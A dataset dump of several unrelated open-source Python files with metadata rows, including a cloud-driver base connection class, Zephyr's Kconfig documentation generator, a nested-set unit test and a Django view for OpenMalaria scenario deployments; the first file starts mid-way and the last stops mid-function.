kwargs = {'action': action, 'params': params, 'data': data,
'headers': headers, 'method': method}
return kwargs
def get_poll_request_kwargs(self, response, context, request_kwargs):
"""
Return keyword arguments which are passed to the request() method when
polling for the job status.
@param response: Response object returned by poll request.
@type response: C{HTTPResponse}
@param request_kwargs: Kwargs previously used to initiate the
poll request.
@type response: C{dict}
@return C{dict} Keyword arguments
"""
raise NotImplementedError('get_poll_request_kwargs not implemented')
def has_completed(self, response):
"""
Return job completion status.
@param response: Response object returned by poll request.
@type response: C{HTTPResponse}
@return C{bool} True if the job has completed, False otherwise.
"""
raise NotImplementedError('has_completed not implemented')
class ConnectionKey(Connection):
"""
A Base Connection class to derive from, which includes a
"""
def __init__(self, key, secure=True, host=None, port=None, url=None,
timeout=None):
"""
Initialize `user_id` and `key`; set `secure` to an C{int} based on
passed value.
"""
super(ConnectionKey, self).__init__(secure=secure, host=host,
port=port, url=url,
timeout=timeout)
self.key = key
class ConnectionUserAndKey(ConnectionKey):
"""
Base connection which accepts a user_id and key.
"""
user_id = None
def __init__(self, user_id, key, secure=True,
host=None, port=None, url=None, timeout=None):
super(ConnectionUserAndKey, self).__init__(key, secure=secure,
host=host, port=port,
url=url, timeout=timeout)
self.user_id = user_id
class BaseDriver(object):
"""
Base driver class from which other classes can inherit from.
"""
connectionCls = ConnectionKey
def __init__(self, key, secret=None, secure=True, host=None, port=None,
api_version=None, **kwargs):
"""
@param key: API key or username to be used (required)
@type key: C{str}
@param secret: Secret password to be used (required)
@type secret: C{str}
@param secure: Weither to use HTTPS or HTTP. Note: Some providers
only support HTTPS, and it is on by default.
@type secure: C{bool}
@param host: Override hostname used for connections.
@type host: C{str}
@param port: Override port used for connections.
@type port: C{int}
@param api_version: Optional API version. Only used by drivers
which support multiple API versions.
@type api_version: C{str}
@rtype: C{None}
"""
self.key = key
self.secret = secret
self.secure = secure
args = [self.key]
if self.secret is not None:
args.append(self.secret)
args.append(secure)
if host is not None:
args.append(host)
if port is not None:
args.append(port)
self.api_version = api_version
self.connection = self.connectionCls(*args,
**self._ex_connection_class_kwargs())
self.connection.driver = self
self.connection.connect()
def _ex_connection_class_kwargs(self):
"""
Return extra connection keyword arguments which are passed to the
Connection class constructor.
"""
return {}
| apache-2.0 | -4,774,518,767,764,823,000 | 29.734671 | 79 | 0.565418 | false |
galak/zephyr | doc/_scripts/gen_kconfig_rest.py | 3 | 26821 | #!/usr/bin/env python3
"""
Generates an alphabetical index of Kconfig symbols with links in index.rst, and
a separate CONFIG_FOO.rst file for each Kconfig symbol.
The generated symbol pages can be referenced in RST as :kconfig:`foo`, and the
generated index page as `configuration options`_.
Optionally, the documentation can be split up based on where symbols are
defined. See the --modules flag.
"""
import argparse
import collections
from operator import attrgetter
import os
import pathlib
import re
import sys
import textwrap
import kconfiglib
import gen_helpers
NO_MAX_WIDTH = """
.. raw:: html
<!--
FIXME: do not limit page width until content uses another representation
format other than tables
-->
<style>.wy-nav-content { max-width: none; !important }</style>
"""
def escape_inline_rst(text):
# Escape reStructuredText inline markup characters
return re.sub(r"(\*|_|`)", r"\\\1", text)
def rst_link(sc):
# Returns an RST link (string) for the symbol/choice 'sc', or the normal
# Kconfig expression format (e.g. just the name) for 'sc' if it can't be
# turned into a link.
if isinstance(sc, kconfiglib.Symbol):
# Skip constant and undefined symbols by checking if expr.nodes is
# empty
if sc.nodes:
# The "\ " avoids RST issues for !CONFIG_FOO -- see
# http://docutils.sourceforge.net/docs/ref/rst/restructuredtext.html#character-level-inline-markup
return fr"\ :kconfig:`{sc.name} <CONFIG_{sc.name}>`"
elif isinstance(sc, kconfiglib.Choice):
# Choices appear as dependencies of choice symbols.
#
# Use a :ref: instead of an :kconfig:. With an :kconfig:, we'd have to have
# an '.. kconfig::' in the choice reference page as well. That would make
# the internal choice ID show up in the documentation.
#
# Note that the first pair of <...> is non-syntactic here. We just display
# choices links within <> in the documentation.
return fr"\ :ref:`<{choice_desc(sc)}> <{choice_id(sc)}>`"
# Can't turn 'sc' into a link. Use the standard Kconfig format.
return kconfiglib.standard_sc_expr_str(sc)
def expr_str(expr):
# Returns the Kconfig representation of 'expr', with symbols/choices turned
# into RST links
return kconfiglib.expr_str(expr, rst_link)
def main():
init()
write_index_pages() # Plural since there's more than one in --modules mode
if os.getenv("KCONFIG_TURBO_MODE") == "1":
write_dummy_syms_page()
else:
write_sym_pages()
def init():
# Initializes these globals:
#
# kconf:
# Kconfig instance for the configuration
#
# out_dir:
# Output directory
#
# index_desc:
# Set to the corresponding command-line arguments (or None if
# missing)
#
# modules:
# A list of (<title>, <suffix>, <path>, <desc. path>) tuples. See the
# --modules flag. Empty if --modules wasn't passed.
#
# <path> is an absolute pathlib.Path instance, which is handy for robust
# path comparisons.
#
# no_index_modules:
# A list of (<title>, <path>) tuples. See the --no-index-modules flag.
# Empty if --no-index-modules wasn't passed.
#
# <path> is an absolute pathlib.Path instance, which is handy for robust
# path comparisons.
#
# separate_all_index:
# True if --separate-all-index was passed
#
# strip_module_paths:
# True unless --keep-module-paths was passed
global kconf
global out_dir
global index_desc
global modules
global no_index_modules
global separate_all_index
global strip_module_paths
args = parse_args()
kconf = kconfiglib.Kconfig(args.kconfig, suppress_traceback=True)
out_dir = args.out_dir
index_desc = args.index_desc
separate_all_index = args.separate_all_index
strip_module_paths = args.strip_module_paths
modules = []
for module_spec in args.modules:
# Split on ',', but keep any ',,' as a literal ','. Temporarily
# represent a literal comma with null.
spec_parts = [part.replace("\0", ",")
for part in module_spec.replace(",,", "\0").split(",")]
if len(spec_parts) == 3:
title, suffix, path_s = spec_parts
desc_path = None
elif len(spec_parts) == 4:
title, suffix, path_s, desc_path = spec_parts
else:
sys.exit(f"error: --modules argument '{module_spec}' should have "
"the format <title>,<suffix>,<path> or the format "
"<title>,<suffix>,<path>,<index description filename>. "
"A doubled ',,' in any part is treated as a literal "
"comma.")
abspath = pathlib.Path(path_s).resolve()
if not abspath.exists():
sys.exit(f"error: path '{abspath}' in --modules argument does not exist")
modules.append((title, suffix, abspath, desc_path))
no_index_modules = []
for module_spec in args.no_index_modules:
# Split on ',', but keep any ',,' as a literal ','. Temporarily
# represent a literal comma with null.
spec_parts = [part.replace("\0", ",")
for part in module_spec.replace(",,", "\0").split(",")]
if len(spec_parts) == 2:
title, path_s = spec_parts
else:
sys.exit(f"error: --no-index-modules argument '{module_spec}' "
"should have the format <title>,<path>.")
abspath = pathlib.Path(path_s).resolve()
if not abspath.is_dir():
sys.exit("error: path '{}' in --no-index-modules argument does not"
" exist".format(abspath))
no_index_modules.append((title, abspath))
def parse_args():
# Parses command-line arguments
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"--kconfig",
metavar="KCONFIG",
default="Kconfig",
help="Top-level Kconfig file (default: Kconfig)")
parser.add_argument(
"--index-desc",
metavar="RST_FILE",
help="""\
Path to an RST file with description text for the top-level
index.rst index page. If missing, a generic description will
be used. Used both in --modules and non-modules mode.
See <index description path> in the --modules description as
well.""")
parser.add_argument(
"--modules",
metavar="MODULE_SPECIFICATION",
nargs="+",
default=[],
help="""\
Specifies that the documentation should be split into
several index pages, based on where symbols are defined.
Each MODULE_SPECIFICATION has the form
<title>,<suffix>,<path>[,<index description path>]
, where <index description path> is optional.
To insert a literal comma into any of the parts, double it,
e.g. 'My title,, with a comma'.
A separate index-<suffix>.rst symbol index page is generated
for each MODULE_SPECIFICATION, with links to all symbols
that are defined inside <path> (possibly more than one level
deep). The title of the index is "<title> Configuration
Options", and a 'configuration_options_<suffix>' RST link
target is inserted at the top of the index page.
If <index description path> is given, it should be the path
to an RST file. The contents of this file will appear under
at the top of the symbol index page for the module,
underneath the heading. If no <index description path> is
given, a generic description is used instead.
The top-level index.rst index page contains a TOC tree that
links to the index-*.rst pages for any modules. It also
includes a list of all symbols, including symbols that do
not appear in any module. Pass --separate-all-index to use a
separate index for the list of all symbols.
If a symbol is defined in more than one module, it will be
listed on several index pages.
Passing --modules also tweaks how paths are displayed on
symbol information pages, showing
'<title>/path/within/module/Kconfig' for paths that fall
within modules. This behavior can be disabled by passing
--keep-module-paths.""")
parser.add_argument(
"--no-index-modules",
metavar="NO_INDEX_MODULE_SPECIFICATION",
nargs="+",
default=[],
help="""\
Passing --no-index-modules works similarly to --modules
but it does not generate index pages. It only tweaks how
paths are displayed on symbol information pages, showing
'<title>/path/within/module/Kconfig' for paths that fall
within modules. This behavior can be disabled by passing
--keep-module-paths.
Each NO_INDEX_MODULE_SPECIFICATION has the form
<title>,<path>
To insert a literal comma into any of the parts, double it,
e.g. 'My title,, with a comma'.""")
parser.add_argument(
"--separate-all-index",
action="store_true",
help="""\
Instead of listing all symbols in index.rst, use a separate
index-all.rst index page, which is linked from index.rst.
Probably only useful in combination with --modules.
index-all.rst has a 'configuration_options_all' RST link
target.
This option can make the documentation build orders of
magnitude faster when the index.rst generated by this script
is the top-level page, because Sphinx currently runs into a
bottleneck with large top-level pages with some themes. See
https://github.com/sphinx-doc/sphinx/issues/6909.""")
parser.add_argument(
"--keep-module-paths",
dest="strip_module_paths",
action="store_false",
help="Do not rewrite paths that fall within modules. See --modules.")
parser.add_argument(
"out_dir",
metavar="OUTPUT_DIRECTORY",
help="Directory to write .rst output files to")
return parser.parse_args()
def write_index_pages():
# Writes all index pages. --modules will give more than one.
# Implementation note: Functions used here add any newlines they want
# before their output themselves. Try to keep this consistent if you change
# things.
write_main_index_page()
write_module_index_pages()
def write_main_index_page():
# Writes the main index page, which lists all symbols. In --modules mode,
# links to the module index pages are included. If --separate-all-index was
# passed, a separate index-all.rst index is generated as well.
rst = index_header(title="Configuration Options",
link="configuration_options",
desc_path=index_desc)
if separate_all_index:
rst += """
This index page lists all symbols, regardless of where they are defined:
.. toctree::
:maxdepth: 1
index-all.rst\
"""
write_if_updated("index-all.rst",
index_header(title="All Configuration Options",
link="configuration_options_all",
desc_path=None) +
NO_MAX_WIDTH +
sym_table_rst("Configuration Options",
kconf.unique_defined_syms))
if modules:
rst += """
These index pages only list symbols defined within a particular subsystem:
.. toctree::
:maxdepth: 1
""" + "\n".join(" index-" + suffix for _, suffix, _, _, in modules)
if not separate_all_index:
rst += NO_MAX_WIDTH
# Put index of all symbols in index.rst
rst += sym_table_rst("All configuration options",
kconf.unique_defined_syms)
write_if_updated("index.rst", rst)
def write_module_index_pages():
# Writes index index-<suffix>.rst index pages for all modules
# Maps each module title to a set of Symbols in the module
module2syms = collections.defaultdict(set)
for sym in kconf.unique_defined_syms:
# Loop over all definition locations
for node in sym.nodes:
mod_title = path2module(node.filename)
if mod_title is not None:
module2syms[mod_title].add(node.item)
# Iterate 'modules' instead of 'module2syms' so that an index page gets
# written even if the module has no symbols
for title, suffix, _, desc_path in modules:
rst = index_header(title=title + " Configuration Options",
link="configuration_options_" + suffix,
desc_path=desc_path)
rst += NO_MAX_WIDTH
rst += sym_table_rst("Configuration Options",
module2syms[title])
write_if_updated(f"index-{suffix}.rst", rst)
def sym_table_rst(title, syms):
# Returns RST for the list of symbols on index pages. 'title' is the
# heading to use.
rst = f"""
{title}
{len(title)*'*'}
.. list-table::
:header-rows: 1
:widths: auto
* - Symbol name
- Prompt
"""
for sym in sorted(syms, key=attrgetter("name")):
rst += f"""\
* - :kconfig:`CONFIG_{sym.name}`
- {sym_index_desc(sym)}
"""
return rst
def sym_index_desc(sym):
# Returns the description used for 'sym' on the index page
for node in sym.nodes:
if node.prompt:
return escape_inline_rst(node.prompt[0])
# No help text or prompt
return ""
def index_header(title, link, desc_path):
# Returns the RST for the beginning of a symbol index page.
#
# title:
# Page title
#
# link:
# Link target string
#
# desc_path:
# Path to file with RST to put at the of the page, underneath the
# heading. If None, a generic description is used.
if desc_path is None:
desc = DEFAULT_INDEX_DESC
else:
try:
with open(desc_path, encoding="utf-8") as f:
desc = f.read()
except OSError as e:
sys.exit("error: failed to open index description file "
f"'{desc_path}': {e}")
return f"""\
.. _{link}:
{title}
{len(title)*'='}
{desc}
This documentation is generated automatically from the :file:`Kconfig` files by
the :file:`{os.path.basename(__file__)}` script. Click on symbols for more
information."""
DEFAULT_INDEX_DESC = """\
:file:`Kconfig` files describe build-time configuration options (called symbols
in Kconfig-speak), how they're grouped into menus and sub-menus, and
dependencies between them that determine what configurations are valid.
:file:`Kconfig` files appear throughout the directory tree. For example,
:file:`subsys/power/Kconfig` defines power-related options.\
"""
def write_sym_pages():
# Writes all symbol and choice pages
for sym in kconf.unique_defined_syms:
write_sym_page(sym)
for choice in kconf.unique_choices:
write_choice_page(choice)
def write_dummy_syms_page():
# Writes a dummy page that just has targets for all symbol links so that
# they can be referenced from elsewhere in the documentation. This speeds
# up builds when we don't need the Kconfig symbol documentation.
rst = ":orphan:\n\nDummy symbols page for turbo mode.\n\n"
for sym in kconf.unique_defined_syms:
rst += f".. kconfig:: CONFIG_{sym.name}\n"
write_if_updated("dummy-syms.rst", rst)
def write_sym_page(sym):
# Writes documentation for 'sym' to <out_dir>/CONFIG_<sym.name>.rst
write_if_updated(f"CONFIG_{sym.name}.rst",
sym_header_rst(sym) +
help_rst(sym) +
direct_deps_rst(sym) +
defaults_rst(sym) +
select_imply_rst(sym) +
selecting_implying_rst(sym) +
kconfig_definition_rst(sym))
def write_choice_page(choice):
# Writes documentation for 'choice' to <out_dir>/choice_<n>.rst, where <n>
# is the index of the choice in kconf.choices (where choices appear in the
# same order as in the Kconfig files)
write_if_updated(choice_id(choice) + ".rst",
choice_header_rst(choice) +
help_rst(choice) +
direct_deps_rst(choice) +
defaults_rst(choice) +
choice_syms_rst(choice) +
kconfig_definition_rst(choice))
def sym_header_rst(sym):
# Returns RST that appears at the top of symbol reference pages
# - :orphan: suppresses warnings for the symbol RST files not being
# included in any toctree
#
# - '.. title::' sets the title of the document (e.g. <title>). This seems
# to be poorly documented at the moment.
return ":orphan:\n\n" \
f".. title:: {sym.name}\n\n" \
f".. kconfig:: CONFIG_{sym.name}\n\n" \
f"{prompt_rst(sym)}\n\n" \
f"Type: ``{kconfiglib.TYPE_TO_STR[sym.type]}``\n\n"
def choice_header_rst(choice):
# Returns RST that appears at the top of choice reference pages
return ":orphan:\n\n" \
f".. title:: {choice_desc(choice)}\n\n" \
f".. _{choice_id(choice)}:\n\n" \
f".. describe:: {choice_desc(choice)}\n\n" \
f"{prompt_rst(choice)}\n\n" \
f"Type: ``{kconfiglib.TYPE_TO_STR[choice.type]}``\n\n"
def prompt_rst(sc):
# Returns RST that lists the prompts of 'sc' (symbol or choice)
return "\n\n".join(f"*{escape_inline_rst(node.prompt[0])}*"
for node in sc.nodes if node.prompt) \
or "*(No prompt -- not directly user assignable.)*"
def help_rst(sc):
# Returns RST that lists the help text(s) of 'sc' (symbol or choice).
# Symbols and choices with multiple definitions can have multiple help
# texts.
rst = ""
for node in sc.nodes:
if node.help is not None:
rst += "Help\n" \
"====\n\n" \
".. code-block:: none\n\n" \
f"{textwrap.indent(node.help, 4 * ' ')}\n\n"
return rst
def direct_deps_rst(sc):
# Returns RST that lists the direct dependencies of 'sc' (symbol or choice)
if sc.direct_dep is sc.kconfig.y:
return ""
return "Direct dependencies\n" \
"===================\n\n" \
f"{expr_str(sc.direct_dep)}\n\n" \
"*(Includes any dependencies from ifs and menus.)*\n\n"
def defaults_rst(sc):
# Returns RST that lists the 'default' properties of 'sc' (symbol or
# choice)
if isinstance(sc, kconfiglib.Symbol) and sc.choice:
# 'default's on choice symbols have no effect (and generate a warning).
# The implicit value hint below would be misleading as well.
return ""
heading = "Default"
if len(sc.defaults) != 1:
heading += "s"
rst = f"{heading}\n{len(heading)*'='}\n\n"
if sc.defaults:
for value, cond in sc.orig_defaults:
rst += "- " + expr_str(value)
if cond is not sc.kconfig.y:
rst += " if " + expr_str(cond)
rst += "\n"
else:
rst += "No defaults. Implicitly defaults to "
if isinstance(sc, kconfiglib.Choice):
rst += "the first (visible) choice option.\n"
elif sc.orig_type in (kconfiglib.BOOL, kconfiglib.TRISTATE):
rst += "``n``.\n"
else:
# This is accurate even for int/hex symbols, though an active
# 'range' might clamp the value (which is then treated as zero)
rst += "the empty string.\n"
return rst + "\n"
def choice_syms_rst(choice):
# Returns RST that lists the symbols contained in the choice
if not choice.syms:
return ""
rst = "Choice options\n" \
"==============\n\n"
for sym in choice.syms:
# Generates a link
rst += f"- {expr_str(sym)}\n"
return rst + "\n"
def select_imply_rst(sym):
# Returns RST that lists the symbols 'select'ed or 'imply'd by the symbol
rst = ""
def add_select_imply_rst(type_str, lst):
# Adds RST that lists the selects/implies from 'lst', which holds
# (<symbol>, <condition>) tuples, if any. Also adds a heading derived
# from 'type_str' if there any selects/implies.
nonlocal rst
if lst:
heading = f"Symbols {type_str} by this symbol"
rst += f"{heading}\n{len(heading)*'='}\n\n"
for select, cond in lst:
rst += "- " + rst_link(select)
if cond is not sym.kconfig.y:
rst += " if " + expr_str(cond)
rst += "\n"
rst += "\n"
add_select_imply_rst("selected", sym.orig_selects)
add_select_imply_rst("implied", sym.orig_implies)
return rst
def selecting_implying_rst(sym):
# Returns RST that lists the symbols that are 'select'ing or 'imply'ing the
# symbol
rst = ""
def add_selecting_implying_rst(type_str, expr):
# Writes a link for each symbol that selects the symbol (if 'expr' is
# sym.rev_dep) or each symbol that imply's the symbol (if 'expr' is
# sym.weak_rev_dep). Also adds a heading at the top derived from
# type_str ("select"/"imply"), if there are any selecting/implying
# symbols.
nonlocal rst
if expr is not sym.kconfig.n:
heading = f"Symbols that {type_str} this symbol"
rst += f"{heading}\n{len(heading)*'='}\n\n"
# The reverse dependencies from each select/imply are ORed together
for select in kconfiglib.split_expr(expr, kconfiglib.OR):
# - 'select/imply A if B' turns into A && B
# - 'select/imply A' just turns into A
#
# In both cases, we can split on AND and pick the first
# operand.
rst += "- {}\n".format(rst_link(
kconfiglib.split_expr(select, kconfiglib.AND)[0]))
rst += "\n"
add_selecting_implying_rst("select", sym.rev_dep)
add_selecting_implying_rst("imply", sym.weak_rev_dep)
return rst
def kconfig_definition_rst(sc):
# Returns RST that lists the Kconfig definition location, include path,
# menu path, and Kconfig definition for each node (definition location) of
# 'sc' (symbol or choice)
# Fancy Unicode arrow. Added in '93, so ought to be pretty safe.
arrow = " \N{RIGHTWARDS ARROW} "
def include_path(node):
if not node.include_path:
# In the top-level Kconfig file
return ""
return "Included via {}\n\n".format(
arrow.join(f"``{strip_module_path(filename)}:{linenr}``"
for filename, linenr in node.include_path))
def menu_path(node):
path = ""
while node.parent is not node.kconfig.top_node:
node = node.parent
# Promptless choices can show up as parents, e.g. when people
# define choices in multiple locations to add symbols. Use
# standard_sc_expr_str() to show them. That way they show up as
# '<choice (name if any)>'.
path = arrow + \
(node.prompt[0] if node.prompt else
kconfiglib.standard_sc_expr_str(node.item)) + \
path
return "(Top)" + path
heading = "Kconfig definition"
if len(sc.nodes) > 1: heading += "s"
rst = f"{heading}\n{len(heading)*'='}\n\n"
for node in sc.nodes:
rst += "\n\n" \
f"At ``{strip_module_path(node.filename)}:{node.linenr}``\n\n" \
f"{include_path(node)}" \
f"Menu path: {menu_path(node)}\n\n" \
".. code-block:: kconfig\n\n" \
f"{textwrap.indent(str(node), 4*' ')}"
# Not the last node?
if node is not sc.nodes[-1]:
# Add a horizontal line between multiple definitions
rst += "\n\n----"
rst += "\n\n*(The 'depends on' condition includes propagated " \
"dependencies from ifs and menus.)*"
return rst
def choice_id(choice):
# Returns "choice_<n>", where <n> is the index of the choice in the Kconfig
# files. The choice that appears first has index 0, the next one index 1,
# etc.
#
# This gives each choice a unique ID, which is used to generate its RST
# filename and in cross-references. Choices (usually) don't have names, so
# we can't use that, and the prompt isn't guaranteed to be unique.
# Pretty slow, but fast enough
return f"choice_{choice.kconfig.unique_choices.index(choice)}"
def choice_desc(choice):
# Returns a description of the choice, used as the title of choice
# reference pages and in link texts. The format is
# "choice <name, if any>: <prompt text>"
desc = "choice"
if choice.name:
desc += " " + choice.name
# The choice might be defined in multiple locations. Use the prompt from
# the first location that has a prompt.
for node in choice.nodes:
if node.prompt:
desc += ": " + node.prompt[0]
break
return desc
def path2module(path):
# Returns the name of module that 'path' appears in, or None if it does not
# appear in a module. 'path' is assumed to be relative to 'srctree'.
# Have to be careful here so that e.g. foo/barbaz/qaz isn't assumed to be
# part of a module with path foo/bar/. Play it safe with pathlib.
abspath = pathlib.Path(kconf.srctree).joinpath(path).resolve()
for name, _, mod_path, _ in modules:
try:
abspath.relative_to(mod_path)
except ValueError:
# Not within the module
continue
return name
return None
def strip_module_path(path):
# If 'path' is within a module, strips the module path from it, and adds a
# '<module name>/' prefix. Otherwise, returns 'path' unchanged. 'path' is
# assumed to be relative to 'srctree'.
if strip_module_paths:
abspath = pathlib.Path(kconf.srctree).joinpath(path).resolve()
for title, _, mod_path, _ in modules:
try:
relpath = abspath.relative_to(mod_path)
except ValueError:
# Not within the module
continue
return f"<{title}>{os.path.sep}{relpath}"
for title, mod_path in no_index_modules:
try:
relpath = abspath.relative_to(mod_path)
except ValueError:
continue
return f"<{title}>{os.path.sep}{relpath}"
return path
def write_if_updated(filename, s):
# Wrapper around gen_helpers.write_if_updated() that uses 'out_dir'.
gen_helpers.write_if_updated(os.path.join(out_dir, filename), s)
if __name__ == "__main__":
main()
| apache-2.0 | 2,115,952,332,719,019,300 | 30.740828 | 110 | 0.60475 | false |
saurabh6790/omn-lib | webnotes/tests/test_nested_set.py | 37 | 3754 | import unittest, webnotes
class TestNSM(unittest.TestCase):
def setUp(self):
webnotes.conn.sql("delete from `tabItem Group`")
self.data = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c1", "t1", 4, 11],
["gc1", "c1", 5, 6],
["gc2", "c1", 7, 8],
["gc3", "c1", 9, 10],
["c2", "t1", 12, 17],
["gc4", "c2", 13, 14],
["gc5", "c2", 15, 16],
["c3", "t1", 18, 19]
]
for d in self.data:
b = webnotes.bean([{
"doctype": "Item Group", "item_group_name": d[0], "parent_item_group": d[1],
"__islocal": 1, "is_group": "Yes"
}])
b.insert()
self.__dict__[d[0]] = b
self.reload_all()
def reload_all(self, data=None):
for d in data or self.data:
self.__dict__[d[0]].load_from_db()
def test_basic_tree(self, data=None):
for d in data or self.data:
self.assertEquals(self.__dict__[d[0]].doc.lft, d[2])
self.assertEquals(self.__dict__[d[0]].doc.rgt, d[3])
def test_validate_loop_move(self):
self.c1.doc.parent_item_group = 'gc3'
self.assertRaises(webnotes.ValidationError, self.c1.save)
def test_rebuild_tree(self):
from webnotes.utils.nestedset import rebuild_tree
rebuild_tree("Item Group", "parent_item_group")
self.test_basic_tree(self.data)
def test_move_group(self):
self.c1.doc.parent_item_group = 'c2'
self.c1.save()
self.reload_all()
new_tree = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c2", "t1", 4, 17],
["gc4", "c2", 5, 6],
["gc5", "c2", 7, 8],
["c1", "t1", 9, 16],
["gc1", "c1", 10, 11],
["gc2", "c1", 12, 13],
["gc3", "c1", 14, 15],
["c3", "t1", 18, 19]
]
self.test_basic_tree(new_tree)
# Move back
self.c1.doc.parent_item_group = 'gc4'
self.c1.save()
self.reload_all()
new_tree = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c2", "t1", 4, 17],
["gc4", "c2", 5, 14],
["c1", "t1", 6, 13],
["gc1", "c1", 7, 8],
["gc2", "c1", 9, 10],
["gc3", "c1", 11, 12],
["gc5", "c2", 15, 16],
["c3", "t1", 18, 19]
]
self.test_basic_tree(new_tree)
# Move to root
# self.c1.doc.parent_item_group = ''
# self.c1.save()
# self.reload_all()
#
# new_tree = [
# ["t1", None, 1, 12],
# ["c0", "t1", 2, 3],
# ["c2", "t1", 4, 9],
# ["gc4", "c2", 5, 6],
# ["gc5", "c2", 7, 8],
# ["c3", "t1", 10, 11],
# ["c1", "t1", 13, 20],
# ["gc1", "c1", 14, 15],
# ["gc2", "c1", 16, 17],
# ["gc3", "c1", 18, 19],
# ]
# self.test_basic_tree(new_tree)
# move leaf
self.gc3.doc.parent_item_group = 'c2'
self.gc3.save()
self.reload_all()
new_tree = [
["t1", None, 1, 20],
["c0", "t1", 2, 3],
["c2", "t1", 4, 17],
["gc4", "c2", 5, 12],
["c1", "t1", 6, 11],
["gc1", "c1", 7, 8],
["gc2", "c1", 9, 10],
["gc5", "c2", 13, 14],
["gc3", "c2", 15, 16],
["c3", "t1", 18, 19]
]
self.test_basic_tree(new_tree)
# delete leaf
from webnotes.model import delete_doc
delete_doc(self.gc2.doc.doctype, self.gc2.doc.name)
new_tree = [
["t1", None, 1, 18],
["c0", "t1", 2, 3],
["c2", "t1", 4, 15],
["gc4", "c2", 5, 10],
["c1", "t1", 6, 9],
["gc1", "c1", 7, 8],
["gc5", "c2", 11, 12],
["gc3", "c2", 13, 14],
["c3", "t1", 16, 17]
]
del self.__dict__["gc2"]
self.reload_all(new_tree)
self.test_basic_tree(new_tree)
#print webnotes.conn.sql("""select name, parent_item_group, lft, rgt from `tabItem Group`""")
# for testing
# for d in new_tree:
# doc = self.__dict__[d[0]].doc
# print doc.name, doc.lft, doc.rgt
def tearDown(self):
webnotes.conn.rollback()
if __name__=="__main__":
import webnotes
webnotes.connect()
unittest.main() | mit | -6,099,264,567,639,548,000 | 22.46875 | 95 | 0.486947 | false |
apache/incubator-allura | ForgeGit/forgegit/tests/__init__.py | 3 | 1048 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Make our own Git tool test decorator
from allura.tests.decorators import with_tool
with_git = with_tool('test', 'Git', 'src-git', 'Git', type='git')
| apache-2.0 | -4,043,995,509,077,892,000 | 42.666667 | 68 | 0.69084 | false |
vecnet/om | website/apps/ts_om_edit/views/ScenarioDeploymentsView.py | 1 | 6440 | # -*- coding: utf-8 -*-
#
# This file is part of the VecNet OpenMalaria Portal.
# For copyright and licensing information about this package, see the
# NOTICE.txt and LICENSE.txt files in its top-level directory; they are
# available at https://github.com/vecnet/om
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License (MPL), version 2.0. If a copy of the MPL was not distributed
# with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
from functools import partial, wraps
import json
from xml.etree.ElementTree import ParseError
from django.core.exceptions import PermissionDenied
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.template.loader import render_to_string
from vecnet.openmalaria.scenario import Scenario
from website.apps.ts_om.models import Scenario as ScenarioModel
from website.apps.ts_om_edit.forms import ScenarioDeploymentsForm, ScenarioDeploymentForm
from website.apps.ts_om_edit.views.ScenarioBaseFormView import ScenarioBaseFormView
from website.apps.ts_om.views.ScenarioValidationView import rest_validate
class ScenarioDeploymentsView(ScenarioBaseFormView):
template_name = "ts_om_edit/deployments.html"
form_class = ScenarioDeploymentsForm
next_url = 'ts_om.summary'
prev_url = 'ts_om.interventions'
step = "deployments"
def get_context_data(self, **kwargs):
context = super(ScenarioDeploymentsView, self).get_context_data(**kwargs)
extra_data = load_deployments_data(self.scenario)
new_context = context.copy()
new_context.update(extra_data)
return new_context
def form_valid(self, form, **kwargs):
component_ids = []
for intervention in self.scenario.interventions.human:
component_ids.append((intervention.id, intervention.id))
ScenarioDeploymentFormSet = formset_factory(wraps(ScenarioDeploymentForm)
(partial(ScenarioDeploymentForm, components=component_ids)),
extra=0, can_delete=True)
deployment_formset = ScenarioDeploymentFormSet(self.request.POST, prefix='deployment')
if not deployment_formset.is_valid():
return super(ScenarioDeploymentsView, self).form_invalid(form)
deployments = []
for form in deployment_formset:
deployment_info = {
'components': form.cleaned_data["components"]
}
if 'xml' in form.cleaned_data and form.cleaned_data["xml"]:
# Preserve "continuous" deployment as a workaround for internal server error
deployment_info["xml"] = form.cleaned_data["xml"]
else:
if 'name' in form.cleaned_data and form.cleaned_data["name"] != "":
deployment_info['name'] = form.cleaned_data["name"]
times = form.cleaned_data["timesteps"].split(',')
coverages = form.cleaned_data["coverages"].split(',')
timesteps = []
for index, time in enumerate(times):
timesteps.append({
"time": time,
"coverage": coverages[index] if len(coverages) > index else coverages[0]
})
deployment_info["timesteps"] = timesteps
deployments.append(deployment_info)
self.scenario.interventions.human.deployments = deployments
return super(ScenarioDeploymentsView, self).form_valid(form, kwargs={'xml': self.scenario.xml})
def parse_deployments(scenario):
deployments = []
for deployment in scenario.interventions.human.deployments:
deployment_info = {'components': deployment.components}
try:
deployment_info["name"] = deployment.name
except AttributeError:
pass
deployment_info["xml"] = ""
try:
timesteps = deployment.timesteps
except:
# Temp workaround for internal server error when using <continuous> deployment
deployment_info["xml"] = deployment.xml
deployment_info["timesteps"] = '1'
deployment_info["coverages"] = '1'
deployments.append(deployment_info)
continue
times = [str(timestep["time"]) for timestep in timesteps]
coverages = [str(timestep["coverage"]) for timestep in timesteps]
deployment_info["timesteps"] = ','.join(times)
deployment_info["coverages"] = ','.join(coverages)
deployments.append(deployment_info)
return deployments
def load_deployments_data(scenario):
component_ids = []
for intervention in scenario.interventions.human:
component_ids.append((intervention.id, intervention.id))
ScenarioDeploymentFormSet = formset_factory(wraps(ScenarioDeploymentForm)
(partial(ScenarioDeploymentForm, components=component_ids)),
extra=0, can_delete=True)
deployment_formset = ScenarioDeploymentFormSet(initial=parse_deployments(scenario),
prefix='deployment')
context = {}
context["deployment_formset"] = deployment_formset
